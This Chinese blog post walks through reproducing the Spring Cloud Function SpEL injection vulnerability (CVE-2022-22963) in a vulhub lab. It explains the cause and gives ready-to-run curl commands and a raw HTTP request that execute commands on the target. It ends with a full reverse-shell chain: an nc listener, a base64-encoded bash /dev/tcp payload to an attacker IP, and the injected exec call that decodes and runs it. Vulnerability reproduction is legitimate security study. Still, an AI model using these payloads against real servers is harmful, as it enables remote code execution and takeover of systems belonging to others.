Spring Cloud Function SpEL 表达式命令注入漏洞复现及利用

最新推荐文章于 2024-09-12 20:04:17 发布

Tauil

最新推荐文章于 2024-09-12 20:04:17 发布

阅读量1k

点赞数 3

文章标签： spring cloud 网络安全 web安全

本文链接：https://blog.csdn.net/Tauil/article/details/125996735

版权

漏洞原理

当properties中配置spring.cloud.function.definition=functionRouter时，会触发RoutingFunction逻辑，在Spring Cloud Function中，RoutingFunction类的 apply 方法会将请求头中的spring.cloud.function.routing-expression参数作为 SpEL 表达式进行处理，从而造成 SpEL 表达式注入漏洞。

Spring Cloud Function SpEL 表达式命令注入漏洞复现

打开vulhub，输入命令

cd spring/CVE-2022-22963
sudo docker-compose up -d
sudo docker-compose ps

可以看到端口设置在8080

终端输入

curl -v 'http://靶机IP:8080/functionRouter' -H "Content-Type: text/plain" -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/hacker")' --data 1111

或者打开burpsuite进行抓包，再发送以下数据包：

POST /functionRouter HTTP/1.1

Host: 靶机IP:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/hacker")

Content-Type: text/plain

Content-Length: 0

在这里插入图片描述

在源码中可以看到，未修改前的代码中spring.cloud.function.routing-expression参数被functionFromExpression接口中的getValue进行处理，该方法使用了StandardEvaluationContext来进行解析SeEL表达式，从而形成了注入漏洞

在这里插入图片描述

利用Spring Cloud Function SpEL 表达式命令注入漏洞进行反弹shell连接

另启一个终端，再终端中输入

nc -lvvp 4444

将以下内容进行base64编码，获得base64编码值

bash -i >& /dev/tcp/攻击机IP/4444 0>&1

回到原来终端，输入

curl -v 'http://靶机IP:8080/functionRouter' -H "Content-Type: text/plain" -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,base64编码值}|{base64,-d}|{bash,-i}")' --data 1111

成功连接上靶机

在这里插入图片描述